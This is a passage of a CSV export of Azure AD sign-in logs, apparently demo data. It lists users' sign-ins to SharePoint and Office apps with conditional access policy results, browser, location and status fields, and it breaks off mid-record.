+1002,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ad7e45db-77a8-4cb5-8947-61466c81c004,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a2626421400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d3a3c86e-d6a1-4323-9bc0-1a2626421400,SigninLogs,Sucess,41.90428925,-85.99833679
+1003,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:26.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2b19a788-00c7-43a5-9dcc-b0b8d5df5d21,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7688e8c0-f176-4f1e-95a2-c1ff34281500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,7688e8c0-f176-4f1e-95a2-c1ff34281500,SigninLogs,Sucess,33.7984581,-84.38828278
+1004,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e144985-c2cb-409f-a177-cd04ab7be097,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ba30877-fe5d-4dc4-8c19-e13f8e3e1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5ba30877-fe5d-4dc4-8c19-e13f8e3e1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1005,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:25.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b030c24-151c-440d-8839-b31bac14b16d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ba30877-fe5d-4dc4-8c19-e13f7c3f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5ba30877-fe5d-4dc4-8c19-e13f7c3f1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1006,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:04.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4965e974-5e29-41f1-a8d7-3e43d0622f4d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079eec111500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079eec111500,SigninLogs,Sucess,41.90428925,-85.99833679
+1007,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:08.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,abc3ecc0-f9a6-4b3c-9607-4915b6d43e06,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0ea812f1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8d371308-4e1f-476f-97d6-c0ea812f1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1008,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:10.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,71cc469f-0076-0000-54b3-36e276f42244,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",206c879d-2196-4a7a-8124-0022a80d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,206c879d-2196-4a7a-8124-0022a80d1400,SigninLogs,Failed,41.90428925,-85.99833679
+1009,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:20.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79975a62-f155-42eb-b935-1b57e2c4a934,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c0245186-29e3-436a-add4-db49bdbd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c0245186-29e3-436a-add4-db49bdbd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+1010,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:05.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aa62ffc3-662e-4324-91da-2d2f71a0404e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access 